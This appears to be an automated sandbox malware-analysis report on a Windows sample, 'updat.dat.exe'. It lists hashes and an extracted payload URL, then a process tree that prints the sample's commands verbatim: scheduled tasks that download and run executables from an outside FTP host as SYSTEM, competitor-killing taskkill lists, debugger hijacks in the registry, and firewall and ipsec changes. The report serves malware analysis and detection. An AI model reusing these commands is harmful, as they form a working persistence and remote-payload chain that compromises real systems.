Analysis
-
max time kernel
150s -
max time network
124s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
07-05-2021 13:01
Static task
static1
Behavioral task
behavioral1
Sample
updat.dat.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
updat.dat.exe
Resource
win10v20210408
General
-
Target
updat.dat.exe
-
Size
307KB
-
MD5
a6ab2c2fd64e96dcfbf2cef7b2b40863
-
SHA1
072e8e442c5727d52c42cf892c58cf9f143ed2a7
-
SHA256
f6b85d37652472106287a32fe547d511b0da9d14d4802fc6346d38bff2d8c8a6
-
SHA512
49e83aebe95241348058a5320a8737d0756247892f3b1bfe913bc2a15cf2b1040b88dc897d0b31641d5252740272901d04104cfabb3b32e747489d268eab4de7
Malware Config
Extracted
http://185.26.113.95:8095/batpower2.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 19 1940 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
lsma12.exelsma12.exeexcludess.exeexcludess2.exepid process 212 lsma12.exe 4932 lsma12.exe 3324 excludess.exe 2340 excludess2.exe -
Modifies Windows Firewall 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Windows\INF\aspnet\lsma12.exe upx \??\c:\windows\inf\aspnet\lsma12.exe upx C:\Windows\INF\aspnet\lsma12.exe upx -
Drops file in Windows directory 5 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\windows\inf\aspnet\excludess.exe powershell.exe File created \??\c:\windows\inf\aspnet\excludess2.exe powershell.exe File created \??\c:\windows\inf\aspnet\lsma12.exe powershell.exe File created \??\c:\windows\inf\aspnet\config.json powershell.exe File created \??\c:\windows\update.exe powershell.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
lsma12.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 lsma12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString lsma12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz lsma12.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 3336 schtasks.exe 2148 schtasks.exe 2124 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 648 timeout.exe -
Kills process with taskkill 20 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1524 taskkill.exe 2124 taskkill.exe 5076 taskkill.exe 2432 taskkill.exe 1056 taskkill.exe 4168 taskkill.exe 804 taskkill.exe 1364 taskkill.exe 3892 taskkill.exe 1220 taskkill.exe 1448 taskkill.exe 996 taskkill.exe 1160 taskkill.exe 4204 taskkill.exe 396 taskkill.exe 996 taskkill.exe 1032 taskkill.exe 2568 taskkill.exe 4048 taskkill.exe 2872 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
updat.dat.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings updat.dat.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exelsma12.exepid process 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe 212 lsma12.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4168 taskkill.exe Token: SeDebugPrivilege 804 taskkill.exe Token: SeDebugPrivilege 996 taskkill.exe Token: SeDebugPrivilege 1032 taskkill.exe Token: SeDebugPrivilege 1160 taskkill.exe Token: SeDebugPrivilege 1364 taskkill.exe Token: SeDebugPrivilege 1524 taskkill.exe Token: SeDebugPrivilege 2568 taskkill.exe Token: SeIncreaseQuotaPrivilege 1448 WMIC.exe Token: SeSecurityPrivilege 1448 WMIC.exe Token: SeTakeOwnershipPrivilege 1448 WMIC.exe Token: SeLoadDriverPrivilege 1448 WMIC.exe Token: SeSystemProfilePrivilege 1448 WMIC.exe Token: SeSystemtimePrivilege 1448 WMIC.exe Token: SeProfSingleProcessPrivilege 1448 WMIC.exe Token: SeIncBasePriorityPrivilege 1448 WMIC.exe Token: SeCreatePagefilePrivilege 1448 WMIC.exe Token: SeBackupPrivilege 1448 WMIC.exe Token: SeRestorePrivilege 1448 WMIC.exe Token: SeShutdownPrivilege 1448 WMIC.exe Token: SeDebugPrivilege 1448 WMIC.exe Token: SeSystemEnvironmentPrivilege 1448 WMIC.exe Token: SeRemoteShutdownPrivilege 1448 WMIC.exe Token: SeUndockPrivilege 1448 WMIC.exe Token: SeManageVolumePrivilege 1448 WMIC.exe Token: 33 1448 WMIC.exe Token: 34 1448 WMIC.exe Token: 35 1448 WMIC.exe Token: 36 1448 WMIC.exe Token: SeIncreaseQuotaPrivilege 1448 WMIC.exe Token: SeSecurityPrivilege 1448 WMIC.exe Token: SeTakeOwnershipPrivilege 1448 WMIC.exe Token: SeLoadDriverPrivilege 1448 WMIC.exe Token: SeSystemProfilePrivilege 1448 WMIC.exe Token: SeSystemtimePrivilege 1448 WMIC.exe Token: SeProfSingleProcessPrivilege 1448 WMIC.exe Token: SeIncBasePriorityPrivilege 1448 WMIC.exe Token: SeCreatePagefilePrivilege 1448 WMIC.exe Token: SeBackupPrivilege 1448 WMIC.exe Token: SeRestorePrivilege 1448 WMIC.exe Token: SeShutdownPrivilege 1448 WMIC.exe Token: SeDebugPrivilege 1448 WMIC.exe Token: SeSystemEnvironmentPrivilege 1448 WMIC.exe Token: SeRemoteShutdownPrivilege 1448 WMIC.exe Token: SeUndockPrivilege 1448 WMIC.exe Token: SeManageVolumePrivilege 1448 WMIC.exe Token: 33 1448 WMIC.exe Token: 34 1448 WMIC.exe Token: 35 1448 WMIC.exe Token: 36 1448 WMIC.exe Token: SeIncreaseQuotaPrivilege 4008 WMIC.exe Token: SeSecurityPrivilege 4008 WMIC.exe Token: SeTakeOwnershipPrivilege 4008 WMIC.exe Token: SeLoadDriverPrivilege 4008 WMIC.exe Token: SeSystemProfilePrivilege 4008 WMIC.exe Token: SeSystemtimePrivilege 4008 WMIC.exe Token: SeProfSingleProcessPrivilege 4008 WMIC.exe Token: SeIncBasePriorityPrivilege 4008 WMIC.exe Token: SeCreatePagefilePrivilege 4008 WMIC.exe Token: SeBackupPrivilege 4008 WMIC.exe Token: SeRestorePrivilege 4008 WMIC.exe Token: SeShutdownPrivilege 4008 WMIC.exe Token: SeDebugPrivilege 4008 WMIC.exe Token: SeSystemEnvironmentPrivilege 4008 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
updat.dat.exeWScript.execmd.exedescription pid process target process PID 4804 wrote to memory of 740 4804 updat.dat.exe WScript.exe PID 4804 wrote to memory of 740 4804 updat.dat.exe WScript.exe PID 4804 wrote to memory of 740 4804 updat.dat.exe WScript.exe PID 740 wrote to memory of 3440 740 WScript.exe cmd.exe PID 740 wrote to memory of 3440 740 WScript.exe cmd.exe PID 740 wrote to memory of 3440 740 WScript.exe cmd.exe PID 3440 wrote to memory of 4168 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 4168 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 4168 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 804 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 804 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 804 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 996 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 996 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 996 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1032 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1032 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1032 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1160 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1160 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1160 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1364 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1364 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1364 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1524 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1524 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1524 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 1800 3440 cmd.exe reg.exe PID 3440 wrote to memory of 1800 3440 cmd.exe reg.exe PID 3440 wrote to memory of 1800 3440 cmd.exe reg.exe PID 3440 wrote to memory of 1820 3440 cmd.exe reg.exe PID 3440 wrote to memory of 1820 3440 cmd.exe reg.exe PID 3440 wrote to memory of 1820 3440 cmd.exe reg.exe PID 3440 wrote to memory of 1100 3440 cmd.exe reg.exe PID 3440 wrote to memory of 1100 3440 cmd.exe reg.exe PID 3440 wrote to memory of 1100 3440 cmd.exe reg.exe PID 3440 wrote to memory of 2080 3440 cmd.exe reg.exe PID 3440 wrote to memory of 2080 3440 cmd.exe reg.exe PID 3440 wrote to memory of 2080 3440 cmd.exe reg.exe PID 3440 wrote to memory of 2292 3440 cmd.exe reg.exe PID 3440 wrote to memory of 2292 3440 cmd.exe reg.exe PID 3440 wrote to memory of 2292 3440 cmd.exe reg.exe PID 3440 wrote to memory of 2500 3440 cmd.exe reg.exe PID 3440 wrote to memory of 2500 3440 cmd.exe reg.exe PID 3440 wrote to memory of 2500 3440 cmd.exe reg.exe PID 3440 wrote to memory of 2568 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 2568 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 2568 3440 cmd.exe taskkill.exe PID 3440 wrote to memory of 2804 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 2804 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 2804 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 2828 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 2828 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 2828 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 3240 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 3240 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 3240 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 3880 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 3880 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 3880 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 4060 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 4060 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 4060 3440 cmd.exe cacls.exe PID 3440 wrote to memory of 4480 3440 cmd.exe cacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\updat.dat.exe"C:\Users\Admin\AppData\Local\Temp\updat.dat.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\TEMP\n.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\temp\c3m.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msinfo.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhos.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhou.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhot.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhous.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhoss.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rundll32.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhoss.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhous.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhot.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhos.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhou.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msinfo.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe /im lsma.exe /im lsmab.exe /im wtcs.exe /im ASBservice.exe /im vid001.exe /im netsv.exe /im uihost64 /im uihost32.exe /im wina.exe /im microsoft.net.exe /im dmw.exe /im dhcpclient.exe /im ctfnom.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\temp\conhou.exe /e /d system4⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\temp\conhos.exe /e /d system4⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\temp\conhot.exe /e /d system4⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\system\msinfo.exe /e /d system4⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\debug\item.dat /e /d system4⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\debug\winu.bat /e /d system4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net1 stop ASBservice4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop ASBservice5⤵
-
C:\Windows\SysWOW64\sc.exesc delete ASBservice4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop msupdate4⤵
-
C:\Windows\SysWOW64\sc.exesc delete msupdate4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop clr_optimization_v4.0.30328_644⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30328_644⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop MicrosoftMsql4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMsql4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop netsv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete netsv4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop NetworkServices4⤵
-
C:\Windows\SysWOW64\sc.exesc delete NetworkServices4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop "Network Remote"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Network Remote"4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop "WinTaskCtrlService"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "WinTaskCtrlService"4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop remotecall4⤵
-
C:\Windows\SysWOW64\sc.exesc delete remotecall4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop rpcept4⤵
-
C:\Windows\SysWOW64\sc.exesc delete rpcept4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop csrss4⤵
-
C:\Windows\SysWOW64\sc.exesc delete csrss4⤵
-
C:\Windows\SysWOW64\net1.exenet1 stop "windows audio control"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows audio control"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp0212.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp0212.site>ps&echo test>>ps&echo 1433>>ps&echo get sab.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "oka" /tr "cmd /c start c:\windows\inf\aspnet\lsma12.exe -p" /ru "system" /sc onstart /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "MicrosoftsWindowsa" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "MicrosoftsWindowsu" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "MicrosoftsWindows" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "MicrosoftsWindowsu1" /F4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\svchost.exe'" delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\wininit.exe'" delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\csrss.exe'" delete4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\WUDFHosts.exe'" delete4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='services.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\services.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\services.exe'" delete4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='lsass.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\lsass.exe'" delete4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Mysa3" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "ok" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Mysa1" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "WindowsUpdate1" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "OfficeUpdaterA" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "\Microsoft\Windows\RAC\BackUpEvent" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "WindowsUpdate3" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "at6" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Windows_Update" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Update" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Update2" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Update4" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "Update3" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "windowsinit" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "System Security Check" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "AdobeFlashPlayer" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "updat_windows" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "at1" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN "at2" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete "\Microsoft\Windows\UPnP\Services" /F4⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= auto4⤵
-
C:\Windows\SysWOW64\net.exenet start MpsSvc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start MpsSvc5⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete policy name=win4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete filterlist name=Allowlist4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete filterlist name=denylist4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete filteraction name=allow4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name="tcp all" dir=in4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name="deny tcp 445" dir=in4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name="deny tcp 139" dir=in4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name="tcpall" dir=out4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=win4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Allowlist4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=denylist4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1354⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1374⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1384⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1394⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4454⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=win assign=y4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "4⤵
-
C:\Windows\SysWOW64\find.exefind "5.1."4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="coronav" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="coronav2" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="coronav2" DELETE4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='coronav2'" DELETE4⤵
-
